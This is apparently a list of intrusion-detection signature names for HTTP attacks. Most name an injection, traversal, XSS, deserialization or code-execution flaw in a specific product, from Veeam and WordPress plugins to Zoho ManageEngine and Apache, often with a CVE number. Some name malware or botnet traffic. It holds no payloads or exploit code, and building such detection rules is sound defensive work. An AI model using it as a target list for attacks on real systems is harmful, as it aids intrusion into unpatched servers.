HTTP_CRL-Veeam-Backup-And-Replication-FindValidSTSEndpointUrl-Authentication-Bypass
HTTP_CRL-Veeam-One-Reporter-importlicense-Page_Load-XML-External-Entity-Injection
HTTP_CRL-Veeam-One-Ssrsreport-Getcustomelementtext-Xml-External-Entity-Injection
HTTP_CRL-Veertu-Anka-Build-Service-Directory-Traversal
HTTP_CRL-Vegadns-Axfr_Get-Command-Injection
HTTP_CRL-Verity-Ultraseek-Search-Path-Disclosure
HTTP_CRL-VHD-PTZ-Camera-Firmware-Command-Injection-CVE-2024-8957
HTTP_CRL-VICIDIAL-Authenticated-Remote-Code-Execution
HTTP_CRL-VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free
HTTP_CRL-Vinchin-Backup-And-Recovery-Command-Injection
HTTP_CRL-Visual-Mining-Netcharts-Server-Projectcontents-File-Rename-Denial-Of-Service
HTTP_CRL-Visual-Mining-Netcharts-Server-Savefile.jsp-Page-Directory-Traversal
HTTP_CRL-VitalSuite-System-Compromise
HTTP_CRL-VMware-Aria-Operations-For-Networks-Command-Injection-CVE-2023-20887
HTTP_CRL-VMware-Aria-Operations-For-Networks-Login-Banner-Stored-Cross-Site-Scripting
HTTP_CRL-VMware-HCX-Listextensions-SQL-Injection
HTTP_CRL-VMware-Hyperic-HQ-Groovy-Script-Console-Java-Execution
HTTP_CRL-VMware-Multiple-Products-Configurator-Command-Injection
HTTP_CRL-VMware-SD-WAN-Edge-Command-Injection-Vulnerability-CVE-2018-6961
HTTP_CRL-VMware-Spring-Cloud-Data-Flow-Skipper-Server-Directory-Traversal
HTTP_CRL-VMware-Spring-Cloud-Gateway-Spel-Code-Injection
HTTP_CRL-VMware-User-Credential-Verification-Request-To-Authentication-Server
HTTP_CRL-VMware-Vcenter-Server-Remote-Code-Execution
HTTP_CRL-VMware-View-Planner-Logupload-Directory-Traversal
HTTP_CRL-VMware-Vrealize-Operations-Manager-API-Certificate-Upload-Directory-Traversal
HTTP_CRL-VMware-Vrealize-Operations-Manager-API-Server-Side-Request-Forgery
HTTP_CRL-VMware-Workspace-ONE-Access-VMSA-2022-0011-Exploit-Chain
HTTP_CRL-VMware-Workspace-One-Template-Injection-CVE-2022-22954
HTTP_CRL-Voipmonitor-SQL-Injection-CVE-2022-24260
HTTP_CRL-Voltronic-Power-Viewpower-Pro-Automatchmac-Command-Injection
HTTP_CRL-Voltronic-Power-Viewpower-Pro-Selectdevicelistby-SQL-Injection
HTTP_CRL-W3who-DLL-Long-Query-BOF
HTTP_CRL-Waledac-Spambot
HTTP_CRL-WAMP-Webmail-No-Url-File-Inclusion
HTTP_CRL-Watchguard-Pre-Auth-RCE-CVE-2022-26318
HTTP_CRL-Wavelink-Emulation-License-Server-HTTP-Header-Processing-Buffer-Overflow
HTTP_CRL-Wazuh-As_Wazuh_Object-Insecure-Deserialization-CVE-2025-24016
HTTP_CRL-Wazuh-Wazuh-Host-Deny-Command-Injection
HTTP_CRL-WD-My-Cloud-NAS-Command-Injection-Vulnerability
HTTP_CRL-Web-Dorado-Ecommerce-WD-SQL-Injection
HTTP_CRL-Web-Server-PHP-Injection
HTTP_CRL-WebBBS-Webbbs_Config.pl-Followup-Parameter-Shell-Execution
HTTP_CRL-WebCake-2-Traffic
HTTP_CRL-Webgais-Cgi-System-Compromise
HTTP_CRL-Webmin-And-Usermin-Format-String-Vulnerability
HTTP_CRL-Webmin-Command-Injection-Vulnerability
HTTP_CRL-Webmin-Cross-Site-Scripting-CVE-2018-19191
HTTP_CRL-Webmin-File-Manager-RCE
HTTP_CRL-Webmin-Package-Updates-Remote-Command-Execution
HTTP_CRL-Webmin-Show.cgi-Command-Execution
HTTP_CRL-Websendmail-Cgi-System-Compromise
HTTP_CRL-Webstore-Ws-Mail-Cgi-System-Compromise
HTTP_CRL-Websvn-Search-Command-Injection
HTTP_CRL-Webui-Mainfile.php-Arbitrary-Command-Injection
HTTP_CRL-WePresent-WiPG-1000-Command-Injection
HTTP_CRL-Werkzeug-Debugger-Remote-Code-Execution
HTTP_CRL-West-Wind-Web-Connection-Multiple-Vulnerabilities
HTTP_CRL-Western-Digital-MyCloud-Multi_uploadify-File-Upload-Vulnerability
HTTP_CRL-Whois-Raw-Cgi-System-Compromise
HTTP_CRL-WIKID-2fa-Enterprise-Server-Groups.jsp-Cross-Site-Scripting
HTTP_CRL-WIKID-2fa-Enterprise-Server-InitDevice-Stored-Cross-Site-Scripting
HTTP_CRL-WIKID-2fa-Enterprise-Server-Log.jsp-SQL-Injection
HTTP_CRL-WIKID-2fa-Enterprise-Server-Preregister-Stored-Cross-Site-Scripting
HTTP_CRL-WIKID-2fa-Enterprise-Server-Processpref.jsp-SQL-Injection
HTTP_CRL-WIKID-2fa-Enterprise-Server-Searchdevices.jsp-SQL-Injection
HTTP_CRL-Wintr-Web-Project-SQL-Injection
HTTP_CRL-Winwebsec-Botnet-Request
HTTP_CRL-Wordpress-10Web-Photo-Gallery-Plugin-Cross-Site-Scripting
HTTP_CRL-Wordpress-Admin-API-Directory-Traversal
HTTP_CRL-Wordpress-Advanced-Custom-Fields-Plugin-Post_Status-Reflected-Cross-Site-Scripting
HTTP_CRL-Wordpress-All-In-One-Wp-Migration-Plugin-Backups-Directory-Traversal
HTTP_CRL-Wordpress-Arbitrary-File-Deletion
HTTP_CRL-Wordpress-Automatic-Plugin-SQL-Injection-CVE-2024-27956
HTTP_CRL-Wordpress-AYS-Popup-Box-Plugin-Class-AYS-Pb-Admin-Reflected-XSS
HTTP_CRL-Wordpress-Backuply-Plugin-Options-SQL-Injection
HTTP_CRL-Wordpress-Beautiful-Cookie-Consent-Banner-Plugin-CVE-2023-3388-Stored-XSS
HTTP_CRL-Wordpress-Better-Search-Replace-Plugin-Insecure-Deserialization
HTTP_CRL-Wordpress-Better-Search-Replace-Plugin-Potential-Insecure-Deserialization
HTTP_CRL-Wordpress-BookingPress-SQLi
HTTP_CRL-Wordpress-C-Library-Gethostbyname-Buffer-Overflow
HTTP_CRL-Wordpress-Calculated-Fields-Form-Cross-Site-Scripting
HTTP_CRL-Wordpress-Comments-Stored-Cross-Site-Scripting
HTTP_CRL-Wordpress-Compfight-1.4-Cross-Site-Scripting
HTTP_CRL-Wordpress-Core-Avatar-Block-Stored-Cross-Site-Scripting
HTTP_CRL-Wordpress-Core-Post-Slug-Stored-Cross-Site-Scripting
HTTP_CRL-Wordpress-Database-Backup-RCE
HTTP_CRL-Wordpress-Download-Manager-Plugin-Attach-File-Stored-Cross-Site-Scripting
HTTP_CRL-Wordpress-Download-Monitor-Plugin-Post_Title-Stored-Cross-Site-Scripting
HTTP_CRL-Wordpress-EasyCart-Plugin-Privilege-Escalation
HTTP_CRL-Wordpress-Events-Made-Easy-Plugin-Lang-SQL-Injection
HTTP_CRL-Wordpress-File-Manager-Plugin-RCE-CVE-2020-25213
HTTP_CRL-Wordpress-Forminator-Plugin-SQL-Injection
HTTP_CRL-Wordpress-GDPR-Cookie-Consent-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Wordpress-Hash-Form-Plugin-RCE
HTTP_CRL-Wordpress-Husky-Products-Filter-Plugin-Local-File-Inclusion-CVE-2025-1661
HTTP_CRL-Wordpress-Husky-Products-Filter-Plugin-Woof_Author-SQL-Injection
HTTP_CRL-Wordpress-InfiniteWP-Client-Authentication-Bypass
HTTP_CRL-Wordpress-Infusionsoft-Gravity-Forms-PHP-Upload
HTTP_CRL-Wordpress-Ketchup-Restaurant-Reservations-Plugin-Data-XSS
HTTP_CRL-Wordpress-Ketchup-Restaurant-Reservations-Plugin-SQL-Injection
HTTP_CRL-Wordpress-KingComposer-Plugin-Reflected-Cross-Site-Scripting
HTTP_CRL-Wordpress-Layerslider-Plugin-SQL-Injection-CVE-2024-2879
HTTP_CRL-Wordpress-Learnpress-Plugin-Handle_params_For_Query_courses-SQL-Injection
HTTP_CRL-Wordpress-Learnpress-Plugin-SQL-Injection-CVE-2024-8522
HTTP_CRL-Wordpress-LiteSpeed-Cache-Plugin-Cross-Site-Scripting-CVE-2023-40000
HTTP_CRL-Wordpress-Long-Password-DoS
HTTP_CRL-Wordpress-Mailchimp-Subscribe-Forms-Php-Code-Execution
HTTP_CRL-Wordpress-MasterStudy-Admin-Account-Creation
HTTP_CRL-Wordpress-Metform-Elementor-Plugin-Form-data.php-Stored-Cross-Site-Scripting
HTTP_CRL-Wordpress-Modern-Events-Calendar-Lite-Plugin-Stored-Cross-Site-Scripting
HTTP_CRL-Wordpress-Multiple-File-Load-DoS-CVE-2018-6389
HTTP_CRL-Wordpress-Ninja-Forms-Plugin-Remote-Code-Execution
HTTP_CRL-Wordpress-Paid-Membership-Pro-Code-Unauthenticated-SQLi
HTTP_CRL-Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_getcheckoutbutton-Stored-XSS
HTTP_CRL-Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_shortcode_Membership-SQL-Injection
HTTP_CRL-Wordpress-Paid-Memberships-Pro-Plugin-SQL-Injection
HTTP_CRL-Wordpress-Photo-Gallery-Plugin-Filter_Tag-SQL-Injection
HTTP_CRL-Wordpress-Photo-Gallery-Plugin-SQL-Injection
HTTP_CRL-Wordpress-Plainview-Activity-Monitor-RCE
HTTP_CRL-Wordpress-Plugin-BBPress-Unauthenticated-Privilege-Escalation
HTTP_CRL-Wordpress-Plugin-Like-Button-Authentication-Bypass-CVE-2019-13344
HTTP_CRL-Wordpress-Plugin-Pie-Register-Auth-Bypass-To-RCE
HTTP_CRL-Wordpress-Plugin-Pie-Register-Blind-SQL-Injection-CVE-2018-10969
HTTP_CRL-Wordpress-Popular-Posts-Authenticated-RCE
HTTP_CRL-Wordpress-Popup-Maker-Plugin-Popup-Settings-Stored-Cross-Site-Scripting
HTTP_CRL-Wordpress-Query-Console-Remote-Code-Execution-CVE-2024-50498
HTTP_CRL-Wordpress-Really-Simple-Ssl-Plugin-Authentication-Bypass-CVE-2024-10924
HTTP_CRL-Wordpress-RegistrationMagic-Task_Ids-Authenticated-SQLi
HTTP_CRL-Wordpress-Rest-API-Posts-Controller-Privilege-Escalation
HTTP_CRL-Wordpress-Royal-Elementor-Addons-And-Templates-Plugin-Unrestricted-File-Upload
HTTP_CRL-Wordpress-Secure-Copy-Content-Protection-And-Content-Locking-Sccp-Id-SQLi
HTTP_CRL-Wordpress-SEO-Plugin-Url-SQL-Injection
HTTP_CRL-Wordpress-Simple-Ads-Manager-Information-Disclosure-CVE-2015-2826
HTTP_CRL-Wordpress-Statistics-Plugin-Template-Functions-Search_Engine-SQL-Injection
HTTP_CRL-Wordpress-The-Events-Calendar-Plugin-Rsvp-Stored-Cross-Site-Scripting
HTTP_CRL-Wordpress-TI-Woocommerce-Wishlist-Plugin-Item_Id-SQL-Injection
HTTP_CRL-Wordpress-TI-Woocommerce-Wishlist-Plugin-SQL-Injection
HTTP_CRL-Wordpress-Tutor-Lms-Plugin-Get_instructors-SQL-Injection
HTTP_CRL-Wordpress-Ultimate-Member-Plugin-Member_Directory_Meta-SQL-Injection
HTTP_CRL-Wordpress-UserPro-Plugin-Reflected-Cross-Site-Scripting
HTTP_CRL-Wordpress-W3-Total-Cache-PHP-Code-Execution
HTTP_CRL-Wordpress-wp-gdpr-compliance-Plugin-Remote-Code-Execution
HTTP_CRL-Wordpress-Wp-Marketplace-Plugin-RCE-CVE-2014-9013
HTTP_CRL-Wordpress-WP-Shortcodes-Plugin-Stored-Cross-Site-Scripting-CVE-2025-0370
HTTP_CRL-Wordpress-Wp-Statistics-Plugin-Current_Page_Id-SQL-Injection
HTTP_CRL-Wordpress-Wp-Statistics-Plugin-Gettop-Stored-Cross-Site-Scripting
HTTP_CRL-Wordpress-Wp-Statistics-Plugin-IP-SQL-Injection
HTTP_CRL-Wordpress-Wpvivid-Backup-Plugin-Class-wpvivid-Directory-Traversal
HTTP_CRL-Wordpress-Wpvivid-Backup-Plugin-Phar-Insecure-Deserialization
HTTP_CRL-Wordpress-Wp_Attached_File-Wp_Crop_Image-Directory-Traversal
HTTP_CRL-WPCargo-Wordpress-Plugin-Arbitrary-File-Write-CVE-2021-25003
HTTP_CRL-WpForo-Wordpress-Plugin-LFI-SSRF-CVE-2023-2249
HTTP_CRL-WSO2-Enterprise-Integrator-Validateconnection-Reflected-Cross-Site-Scripting
HTTP_CRL-Wwbn-Avideo-Chunkfile-Command-Injection
HTTP_CRL-Wwbn-Avideo-Image403-Error-Message-Cross-Site-Scripting
HTTP_CRL-Wwbn-Avideo-Wget-Downloadurl-Command-Injection
HTTP_CRL-XCSSET-Malware-Traffic-2
HTTP_CRL-Xorpix.bh-Traffic
HTTP_CRL-XpoLog-Center-Remote-Command-Execution
HTTP_CRL-Xwiki-Attachmentselector-Docname-Code-Injection
HTTP_CRL-Xwiki-Deleteattachment-Stored-Cross-Site-Scripting
HTTP_CRL-Xwiki-Legacynotificationadministration-Since-Code-Injection
HTTP_CRL-Xwiki-Mentionsmacro.XML-Code-Injection
HTTP_CRL-Xwiki-Searchsuggestconfigsheet-Server-Side-Template-Injection
HTTP_CRL-Xwiki-Searchsuggestsourcesheet-Code-Injection
HTTP_CRL-Xwiki-Solrsearchmacros-Text-Code-Injection
HTTP_CRL-Xwiki-Tipspanel-XWiki.uiextensionclass-Code-Injection
HTTP_CRL-Xwiki-Xwikiserverclasssheet-Code-Injection
HTTP_CRL-Xwiki.org-Change-Request-Extension-Code-Injection
HTTP_CRL-Xwiki.org-Xwiki-Adminsheet-Section-Code-Injection
HTTP_CRL-Xwiki.org-Xwiki-Databasesearch-Code-Injection
HTTP_CRL-Xwiki.org-Xwiki-Movestep1.vm-Cross-Site-Scripting
HTTP_CRL-Xwiki.org-Xwiki-Notificationrssservice-Code-Injection
HTTP_CRL-Xwiki.org-Xwiki-Registrationconfig-Code-Injection
HTTP_CRL-Xwiki.org-Xwiki-Registrationconfig-Code-Injection-Suspected-Compromise
HTTP_CRL-Xwiki.org-Xwiki-Schedulerjobsheet-Code-Injection
HTTP_CRL-Xwiki.org-Xwiki-Searchadmin-Code-Injection
HTTP_CRL-Xwiki.org-Xwiki-Skinscode.xwikiskinssheet-Code-Injection
HTTP_CRL-Xwiki.org-Xwiki-Solr-Space-Facet-Code-Injection
HTTP_CRL-Xwiki.org-Xwiki-TextAreaClass-displayView-Code-Injection
HTTP_CRL-Xwiki.org-Xwiki-Uiextension-Wikiuiextensionparameters-Code-Injection
HTTP_CRL-Xwiki.org-Xwiki-User-Profile-Stored-Cross-Site-Scripting
HTTP_CRL-Yealink-Device-Management-Command-Injection-CVE-2021-27561
HTTP_CRL-YoungZSoft-CMailServer-CMailCOM-ActiveX-Control-Buffer-Overflow
HTTP_CRL-YouPHPTube-Checkconfiguration.php-Remote-Code-Execution
HTTP_CRL-YouPHPTube-Encoder-Getspiritsfromvideo.php-Command-Injection
HTTP_CRL-YouPHPTube-SQL-Injection-Vulnerability
HTTP_CRL-Ysoserial-Generated-DotNet-Serialized-Object
HTTP_CRL-Zabbix-Authenticated-Remote-Command-Execution
HTTP_CRL-Zabbix-Geomap-Stored-Cross-Site-Scripting
HTTP_CRL-Zen-Cart-Ajax.php-Remote-Code-Execution
HTTP_CRL-ZenTao-Pro-Remote-Code-Execution
HTTP_CRL-Zeroboard-Dir-Parameter-Php-Code-Injection
HTTP_CRL-Zeroboard-Print-Category-Php-Dir-Parameter-Php-Code-Injection
HTTP_CRL-ZeroShell-Command-Injection-CVE-2019-12725
HTTP_CRL-Zimbra-Collaboration-Calendar-Reflected-Cross-Site-Scripting
HTTP_CRL-Zimbra-Collaboration-Cancelpendingaccountonlyremotewipe-SQL-Injection
HTTP_CRL-Zimbra-Collaboration-Cross-Site-Scripting-CVE-2023-34192
HTTP_CRL-Zimbra-Collaboration-CVE-2024-50599-Cross-Site-Scripting
HTTP_CRL-ZK-Framework-AuUploader-Authentication-Bypass-CVE-2022-36537
HTTP_CRL-ZK-Framework-Potential-AuUploader-Authentication-Bypass-CVE-2022-36537
HTTP_CRL-Zoho-Corporation-Manageengine-Admanager-Plus-Command-Injection-CVE-2023-29084
HTTP_CRL-Zoho-Manageengine-ADaudit-Plus-Getlockouthistorydata-SQL-Injection
HTTP_CRL-Zoho-Manageengine-ADaudit-Plus-Processtrackinglistener-External-Entity-Injection
HTTP_CRL-Zoho-Manageengine-Admanager-Plus-Proxy-Settings-Command-Injection
HTTP_CRL-Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass
HTTP_CRL-Zoho-Manageengine-Adselfservice-Plus-Mobile-App-Authentication-API-DoS
HTTP_CRL-Zoho-Manageengine-Adselfservice-Plus-Password-Command-Injection
HTTP_CRL-Zoho-Manageengine-ApplicationManager-TestCredential.do-Command-Injection
HTTP_CRL-Zoho-Manageengine-Applications-Manager-Alertres_mtrgrp.jsp-Sid-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Applications-Manager-Buffer.jsp-Resourceid-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Applications-Manager-Custom-Monitor-Type-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Applications-Manager-CVE-2023-28341-Stored-XSS
HTTP_CRL-Zoho-Manageengine-Applications-Manager-Displayname-Stored-Cross-Site-Scripting
HTTP_CRL-Zoho-Manageengine-Applications-Manager-Getassociatemonitors-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Applications-Manager-Mypage.do-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Applications-Manager-Popup_sla.jsp-Sid-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Applications-Manager-Program-Action-Cross-Site-Scripting
HTTP_CRL-Zoho-Manageengine-Applications-Manager-Resourceid-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Applications-Manager-Rulesconstructor.jsp-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Applications-Manager-Showmonitorgroupview-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Applications-Manager-Uricollector-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Applications-Manager-Url-Monitor-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Desktop-Central-Arbitrary-File-Deletion
HTTP_CRL-Zoho-Manageengine-Multiple-Products-Getdnsresolveoption-Command-Injection
HTTP_CRL-Zoho-Manageengine-Multiple-Products-Getnmapinitialoption-Command-Injection
HTTP_CRL-Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
HTTP_CRL-Zoho-Manageengine-Multiple-Products-Invokedatauploadtool-Command-Injection
HTTP_CRL-Zoho-Manageengine-NetFlow-Analyzer-Reportapihandler-Comparereport-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Opmanager-Alarms-Section-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Opmanager-Apidbutil-Getdevicesforsearchstring-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Opmanager-BusinessViewFlashImpl-Xxe
HTTP_CRL-Zoho-Manageengine-Opmanager-Getreportdata-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Opmanager-Opmanagerfailoverutil-Customername-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Opmanager-Oputilsservlet-Authentication-Bypass
HTTP_CRL-Zoho-Manageengine-Opmanager-Relationalmailserver-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Opmanager-Setmanaged-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Password-Manager-Pro-Dashboardtablecontroller-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Password-Manager-Pro-Landingserverfilter-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Password-Manager-Pro-Usergrouplisttablecontroller-SQL-Injection
HTTP_CRL-Zoho-Manageengine-Recoverymanager-Plus-Updateproxysettings-Command-Injection
HTTP_CRL-Zoho-Manageengine-Remote-Code-Execution-CVE-2022-47966
HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-CVE-2021-46065-Stored-Cross-Site-Scripting
HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-Embed-Video-Link-Stored-Cross-Site-Scripting
HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-File-Upload-CVE-2019-8394
HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-Releases-Status-Comments-Stored-Cross-Site-Scripting
HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-Remote-Code-Execution-CVE-2021-44077
HTTP_CRL-Zoho-Manageengine-SupportCenter-Plus-Custom-Schedules-Executor-Command-Injection
HTTP_CRL-ZoneMinder-Snapshots-Command-Injection
HTTP_CRL-Zusy.24405-Traffic
HTTP_CRL-ZyXEL-NAS-Backdoor-Account-CVE-2024-29972
HTTP_CRL-ZyXEL-NAS-Command-Injection-CVE-2023-27992-CVE-2023-4473
HTTP_CRL-ZyXEL-NAS-Command-Injection-CVE-2024-29973
HTTP_CRL-ZyXEL-Parse_config.py-Command-Injection
HTTP_CRL-ZyXEL-Privilege-Escalation-And-Information-Disclosure-CVE-2024-29976
HTTP_CRL-ZyXEL-Remote-Code-Execution-CVE-2022-30525
HTTP_CRL-ZyXEL-Undocumented-User-Credentials-CVE-2020-29583
HTTP_CRL_Apache-Airflow-Remote-Code-Execution-CVE-2020-11978
HTTP_CRL_Belkin-N750-MiniHttpd-Buffer-Overflow
HTTP_CRL_Bumat-rts-Traffic
HTTP_CRL_Canon-Printer-Denial-Of-Service
HTTP_CRL_Centreon-SQL-And-Command-Injection
HTTP_CRL_CryptKeeper.A-Traffic
HTTP_CRL_ElasticSearch-Dynamic-Scripting-Code-Execution
HTTP_CRL_Eupuds.A-Traffic
HTTP_CRL_Foreign-Botnet-Traffic
HTTP_CRL_Heloag.A-Traffic
HTTP_CRL_Horde-Unserialize-PHP-Code-Execution
HTTP_CRL_Junos-OS-Path-Traversal-During-File-Upload-CVE-2022-22245
HTTP_CRL_MantisBT-Admin-SQL-Injection
HTTP_CRL_Movable-Type-Remote-Code-Execution
HTTP_CRL_Obfuscator.AJK-Traffic
HTTP_CRL_Oracle-Business-Intelligence-Enterprise-Edition-CVE-2020-14864
HTTP_CRL_Pulse-Secure-Downloadlicenses.cgi-Command-Injection-CVE-2020-8218
HTTP_CRL_Qakbot-Botnet-Traffic
HTTP_CRL_Red-Hat-CloudForms-Management-Engine-Directory-Traversal
HTTP_CRL_SkyBlueCanvas-CMS-Command-Execution
HTTP_CRL_Sophos-Web-Appliance-Remote-Command-Execution
HTTP_CRL_Suspicious-Java-Serialized-Object
HTTP_CRL_Uranico.A-Traffic
HTTP_CRL_VICIDIAL-Dialer-SQL-And-Command-Injection
HTTP_CRL_VMTurbo-Operations-Manager-Remote-Command-Execution
HTTP_CRL_ZoneMinder-Video-Server-Command-Execution
HTTP_CS- Clipbucket-File-Upload-And-Command-Injection
HTTP_CS-180-Search-Assistant-Information-Disclosure
HTTP_CS-3CX-Phone-System-VAD_Deploy.aspx-Arbitrary-File-Upload
HTTP_CS-Accellion-FTA-statecode-Cookie-Remote-File-Disclosure
HTTP_CS-Acquia-Mautic-Tracking-Pixel-Stored-Cross-Site-Scripting
HTTP_CS-Admbook-Php-Code-Execution
HTTP_CS-Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload
HTTP_CS-Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload-Second
HTTP_CS-Adobe-ColdFusion-Ckeditor-Upload-Unrestricted-File-Upload
HTTP_CS-Adobe-ColdFusion-Ckeditor-Upload.cfm-Directory-Traversal
HTTP_CS-Adobe-Commerce-And-Magento-Open-Source-External-Entity-Injection-CVE-2024-34102
HTTP_CS-Adobe-Commerce-And-Magento-Open-Source-Shipping-Policy-Cross-Site-Scripting
HTTP_CS-Adobe-RoboHelp-Server-Arbitrary-File-Upload
HTTP_CS-Adobe-RoboHelp-Server-Filename-Directory-Traversal
HTTP_CS-Advantech-Iview-CVE-2022-2138-Denial-Of-Service
HTTP_CS-Advantech-WebAccess-Dashboard-Uploadimagecommon-Arbitrary-File-Upload
HTTP_CS-Advantech-WebAccess-NMS-Configrestoreaction-Arbitrary-File-Upload
HTTP_CS-Advantech-WebAccess-NMS-Dbbackuprestoreaction-Arbitrary-File-Upload
HTTP_CS-Advantech-WebAccess-NMS-Fwupgradeaction-Arbitrary-File-Upload
HTTP_CS-Advantech-WebAccess-NMS-LicenseImportAction-Arbitrary-File-Upload
HTTP_CS-Advantech-WebAccess-NMS-ProfileResource-importFile-Arbitrary-File-Upload
HTTP_CS-Advantech-WebAccess-NMS-saveBackgroundAction-Directory-Traversal
HTTP_CS-Advantech-WebAccess-Scada-Gmicons-Picfile-Arbitrary-File-Upload
HTTP_CS-Advantech-WISE-PaaS-RMM-Upgrademgmt-Upload_ota-Arbitrary-File-Upload
HTTP_CS-Advantech-WISE-PaaS-RMM-upload2eMap-LastMapName-Arbitrary-File-Upload
HTTP_CS-Adware-Tickerbar
HTTP_CS-Agent-Tesla-Malware-Infection-Traffic
HTTP_CS-Agent-Tesla-Panel-Remote-Code-Execution
HTTP_CS-Alibaba-DOS
HTTP_CS-Alibaba-Nacos-Authfilter-Authentication-Bypass
HTTP_CS-Alibaba-Nacos-ConfigOpsController-Authentication-Bypass
HTTP_CS-Alienvault-Ossim-AV-Centerd-Util.pm-Get_License-Arbitrary-Command-Execution
HTTP_CS-Alienvault-Ossim-AV-Centerd-Util.pm-Request-Arbitrary-Command-Execution
HTTP_CS-Allegra-Excel-Import-Insecure-Deserialization
HTTP_CS-Android-Gingermaster.A-3-Traffic
HTTP_CS-AOL-Instant-Messenger-Usage
HTTP_CS-Apache-APISIX-Admin-API-Default-Access-Token-RCE
HTTP_CS-Apache-Apr-Util-IPv6-URI-Parsing-Vulnerability
HTTP_CS-Apache-Axis-Jsp-File-Upload
HTTP_CS-Apache-Chunked-Encoding-BO-4
HTTP_CS-Apache-Commons-Fileupload-Parserequest-Denial-Of-Service
HTTP_CS-Apache-Commons-Text-Remote-Code-Execution-CVE-2022-42889
HTTP_CS-Apache-Couchdb-JSON-Remote-Privilege-Escalation
HTTP_CS-Apache-Crlf-DoS
HTTP_CS-Apache-HTTP-Server-Mod-Dav-Merge-Request-Denial-Of-Service
HTTP_CS-Apache-HTTP-Server-Mod_tcl-Module-Format-String-Vulnerability
HTTP_CS-Apache-Httpd-Mod_HTTP2-Null-Pointer-Dereference
HTTP_CS-Apache-Httpd-Mod_Lua-req_parsebody-Denial-Of-Service
HTTP_CS-Apache-Httpd-Mod_Lua-req_parsebody-Integer-Underflow
HTTP_CS-Apache-Httpd-Mod_Proxy-Security-Bypass
HTTP_CS-Apache-Httpd-Mod_Proxy_ajp-Denial-Of-Service
HTTP_CS-Apache-Httpd-Mod_remoteip-Buffer-Overflow
HTTP_CS-Apache-Httpd-Mod_sed-CVE-2022-30522-Denial-of-Service
HTTP_CS-Apache-ISAPI-Module-Dangling-Pointer
HTTP_CS-Apache-ISAPI-Module-Dangling-Pointer-2
HTTP_CS-Apache-Jspwiki-Upload-Stored-Cross-Site-Scripting
HTTP_CS-Apache-Kylin-Rest-API-Admin-Configuration-Information-Disclosure
HTTP_CS-Apache-NiFi-API-Remote-Code-Execution
HTTP_CS-Apache-Olingo-XML-External-Entity-Injection
HTTP_CS-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability
HTTP_CS-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability-Suspected
HTTP_CS-Apache-ShenYu-Plugin-API-Information-Disclosure
HTTP_CS-Apache-Struts-File-Upload-Vulnerabilities-CVE-2023-50164-CVE-2024-53677
HTTP_CS-Apache-Struts-OGNL-Remote-Code-Execution
HTTP_CS-Apache-Struts-OGNL-Remote-Code-Execution-CVE-2020-17530
HTTP_CS-Apache-Struts2-File-Upload-DoS
HTTP_CS-Apache-Subversion-Mod_Dav_SVN-Denial-Of-Service
HTTP_CS-Apache-Superset-Import-Dashboards-CVE-2018-8021
HTTP_CS-Apache-Tika-Header-Command-Injection
HTTP_CS-Apache-Tomcat-Chunked-Transfer-Denial-Of-Service
HTTP_CS-Apache-Tomcat-Chunkedinputfilter-Denial-Of-Service
HTTP_CS-Apache-Tomcat-HTTP2parser-Denial-Of-Service-CVE-2024-24549
HTTP_CS-Apache-Tomcat-Manager-Authenticated-Upload-Code-Execution
HTTP_CS-Apache-Tomcat-Manager-Authenticated-Upload-Code-Execution-2
HTTP_CS-Apache-Tomcat-Snp-Access
HTTP_CS-Apache-Tomcat-Transfer-Encoding-Information-Disclosure
HTTP_CS-Apache-Tomcat-WebSocket-Infinite-Loop-DoS
HTTP_CS-Apache-WebDAV-Propfind-Access
HTTP_CS-Apache2-Out-Of-Memory-DoS
HTTP_CS-Apple-CUPS-Cupsd-Privilege-Escalation
HTTP_CS-Apple-CUPS-Cupsddoselect-Remote-Code-Execution
HTTP_CS-Apple-CUPS-IPP-Use-After-Free-Memory-Corruption
HTTP_CS-Apple-CUPS-PNG-Filter-Overly-Large-Image-Height-Integer-Overflow
HTTP_CS-Apple-CUPS-Sgi-Image-Format-Decoding-Imagetops-Filter-Buffer-Overflow
HTTP_CS-AppRain-CMF-Arbitrary-PHP-File-Upload
HTTP_CS-APSystems-ECU-R-Command-Injection-CVE-2022-45699
HTTP_CS-Arcserve-UDP-FileHandlingServlet-doUpload-Directory-Traversal
HTTP_CS-Arcserve-Unified-Data-Protection-Getbackuppolicies-Information-Disclosure
HTTP_CS-Armageddon-Bot-Traffic
HTTP_CS-Artica-Proxy-FW-Progress-Details-Directory-Traversal
HTTP_CS-Artica-Proxy-Squid.conf-Authentication-Bypass
HTTP_CS-Asn-1-Integer-BOF-MS04-007
HTTP_CS-Asterisk-TLS-HTTP-Content-Length-Denial-Of-Service
HTTP_CS-AsusWRT-Lan-Unauthenticated-Remote-Code-Execution
